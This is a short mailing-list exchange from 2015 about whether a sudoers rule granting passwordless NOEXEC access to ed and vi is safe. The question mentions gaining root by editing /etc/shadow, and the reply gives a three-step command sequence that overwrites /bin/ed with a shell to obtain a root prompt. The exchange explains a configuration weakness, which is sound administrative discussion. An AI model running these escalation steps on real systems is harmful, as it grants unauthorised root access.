On Tue, 28 Apr 2015, at 04:46 AM, whynot sudo wrote: > Hello list, > > We know it's safer* to use sudoedit, but what bad things can happen if we > have the following in sudoers? > > Cmnd_Alias FOO = /bin/ed, /usr/bin/ed, /usr/bin/vi > foouser LOCALHOST = NOPASSWD: NOEXEC: FOO > > Can the "foouser" escape to root prompt? - of course besides that he > could now edit the /etc/shadow file to put a custom pwd hash to the root > user to become root in about 3 seconds.. > > Maybe some magic in .vimrc? > > *=sudo vi would run as root. but sudoedit would run as the given user, > the edited file will be copied before/after editing it. > > Thanks. >
$ sudo vi /bin/ksh :w! /bin/ed :q $ sudo ed # -- Carlin